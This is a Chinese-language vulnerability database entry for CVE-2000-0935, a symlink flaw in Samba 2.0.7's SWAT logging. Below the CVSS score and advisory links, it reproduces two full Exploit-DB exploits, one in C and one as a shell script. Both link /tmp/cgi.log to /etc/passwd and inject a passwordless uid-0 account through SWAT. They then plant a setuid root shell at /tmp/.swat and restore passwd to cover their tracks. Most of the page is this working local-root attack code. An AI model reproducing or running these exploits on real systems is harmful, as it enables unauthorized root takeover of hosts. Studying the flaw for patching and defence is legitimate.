CVE-2000-0935
CVSS7.2
发布时间 :2000-12-19 00:00:00
修订时间 :2008-09-05 16:22:14
NMCOE    

[原文]Samba Web Administration Tool (SWAT) in Samba 2.0.7 allows local users to overwrite arbitrary files via a symlink attack on the cgi.log file.


[CNNVD]Samba漏洞(CNNVD-200012-086)

        Samba 2.0.7版本的Samba Web Administration Tool (SWAT)存在漏洞。本地用户借助cgi.log文件的符号链接攻击改写任意文件。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0935
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0935
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-086
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1872
(VENDOR_ADVISORY)  BID  1872
http://archives.neohapsis.com/archives/bugtraq/2000-10/0430.html
(VENDOR_ADVISORY)  BUGTRAQ  20001030 Samba 2.0.7 SWAT vulnerabilities
http://xforce.iss.net/static/5443.php
(VENDOR_ADVISORY)  XF  samba-swat-logging-sym-link

- 漏洞信息

Samba漏洞
高危 未知
2000-12-19 00:00:00 2005-05-02 00:00:00
本地  
        Samba 2.0.7版本的Samba Web Administration Tool (SWAT)存在漏洞。本地用户借助cgi.log文件的符号链接攻击改写任意文件。

- 公告与补丁

        

- 漏洞信息 (20338)

SAMBA 2.0.7 SWAT Symlink Vulnerability (1) (EDBID:20338)
linux local
2000-11-01 Verified
0 optyx
N/A [点击下载]
source: http://www.securityfocus.com/bid/1872/info

The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access. 

This problem in particular is a symlink problem where user can take advantage of poor programming in SWAT's logging facilities (which are not enabled by default) to overwrite files with user specified data. In this case, the logging is enabled under SWAT it logs by default to:

/tmp/cgi.log

This file logs all traffic to the web service, regrettably this file does not have restrictive permissions set on it and local users may symlink 
the file to any other file (which they have read access to) on the system. They can then connect to the port in question (701 by default) and have the data they type in entered into a file of their choice, typically /etc/passwd .

/****************************************************************************\
**                                                                          **
**   Swat exploit for Samba 2.0.7 compiled with the cgi logging turned on   **
**                                                                          **
**   shell script version available for our friends, the self-proclaimed    **
**   security experts at corky.net (h4h32h4h4h4h4), using netcat, as they   **
**   deem more elegant than a self-contained exploit (ala this .c), l4m3    **
**   exploit by optyx <optyx@uberhax0r.net>                                 **
**   vulnerability discoverd by miah <miah@uberhax0r.net>                   **
**                                                                          **
**   on a side note, Just Marc rocks, so much, he doesn't set an sa pass    **
**   on his mysql server (doesn't take an elite hacker to use mysqlclient)  **
**   oh and a special message:                                              **
**   Hey babe, your hair's alright Hey babe, let's go out tonight (h4h4h)   **
**                                                                          **
\****************************************************************************/                  
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define REALLY_FUCKING_LONG_COMMAND "su uberhaxr -c \"cp -pdf /tmp/.bak \
/etc/passwd; chown root.root /etc/passwd; touch -fr /tmp/.bak /etc/passwd\""

int main(void) {

   int r, s;
   struct sockaddr_in s_addr;
   
   printf("backing up /etc/passwd\n");
   system("cp -pd /etc/passwd /tmp/.bak");
   system("touch -r /etc/passwd /tmp/.bak");

   if(system("/bin/ln -sf /etc/passwd /tmp/cgi.log") > 0) {
      printf("error, /tmp/cgi.log could not be linked to /etc/passwd\n");
      unlink("/tmp/.bak");
      exit(-1);
   }

   printf("connecting to swat\n");
   s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

   if(s < 0) {
      printf("error, could not create socket\n");
      unlink("/tmp/.bak");
      unlink("/tmp/cgi.log");
      exit(-1);
   }

   s_addr.sin_family = PF_INET;
   s_addr.sin_port = htons(901);
   s_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
   r = connect(s, (struct sockaddr *) &s_addr, sizeof(s_addr));

   if(r==-1) {
      printf("error, cannot connect to swat\n");
      unlink("/tmp/.bak");
      unlink("/tmp/cgi.log");
      exit(-1);
   }

   send(s, "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash\n", 1024, 0);
   close(s);

   if(system("su -l uberhaxr -c \"cp -f /bin/bash /tmp/.swat\"") > 0) {
      printf("exploit failed\n");
      unlink("/tmp/.bak");
      unlink("/tmp/cgi.log");
      exit(-1);
   }

   system("su -l uberhaxr -c \"chmod u+s /tmp/.swat\"");
   printf("restoring /etc/passwd\n");   
   system(REALLY_FUCKING_LONG_COMMAND);
   unlink("/tmp/.bak");
   unlink("/tmp/cgi.log");
   printf("got root? (might want to rm /tmp/.swat)\n");
   system("/tmp/.swat"); 
     
   return 0; 
}		

- 漏洞信息 (20339)

SAMBA 2.0.7 SWAT Symlink Vulnerability (2) (EDBID:20339)
linux local
2000-11-01 Verified
0 optyx
N/A [点击下载]
source: http://www.securityfocus.com/bid/1872/info
 
The Samba software suite is a collection of programs that implements the SMB protocol for unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or Netbios protocol. Samba ships with a utility titled SWAT (Samba Web Administration Tool) which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability local users can use to leverage root access.
 
This problem in particular is a symlink problem where user can take advantage of poor programming in SWAT's logging facilities (which are not enabled by default) to overwrite files with user specified data. In this case, the logging is enabled under SWAT it logs by default to:
 
/tmp/cgi.log
 
This file logs all traffic to the web service, regrettably this file does not have restrictive permissions set on it and local users may symlink
the file to any other file (which they have read access to) on the system. They can then connect to the port in question (701 by default) and have the data they type in entered into a file of their choice, typically /etc/passwd .


#!/bin/sh
# swat for samba 2.0.7 compiled with cgi logging exploit
# discovered by miah <miah@uberhax0r.net>
# exploit by optyx <optyx@uberhax0r.net>
if [ -f /tmp/cgi.log ]; then
if [ `rm -f /tmp/cgi.log` ]; then
echo "/tmp/cgi.log exists and cannot be deleted"
exit
fi
fi
echo "backing up /etc/passwd"
cp -pd /etc/passwd /tmp/.bak
touch -r /etc/passwd /tmp/.bak
ln -s /etc/passwd /tmp/cgi.log
echo "connecting to swat"
echo -e "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash\n"| nc -w 1 localhost swat
if [ `su -l uberhaxr -c "cp /bin/bash /tmp/.swat"` ]; then
echo "exploit failed"
rm /tmp/.bak
rm /tmp/cgi.log
exit
fi
su -l uberhaxr -c "chmod u+s /tmp/.swat"
echo "restoring /etc/passwd"
su -l uberhaxr -c "cp -pd /tmp/.bak /etc/passwd; \
chown root.root /etc/passwd; \
touch -r /tmp/.bak /etc/passwd"
rm /tmp/.bak
rm /tmp/cgi.log
echo "got root? (might want to rm /tmp/.swat)"
/tmp/.swat
		

- 漏洞信息

215
Samba Web Administration Tool (SWAT) cgi.log Symlink Arbitrary File Modification
Local Access Required Race Condition
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-10-30 Unknow
2000-10-30 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站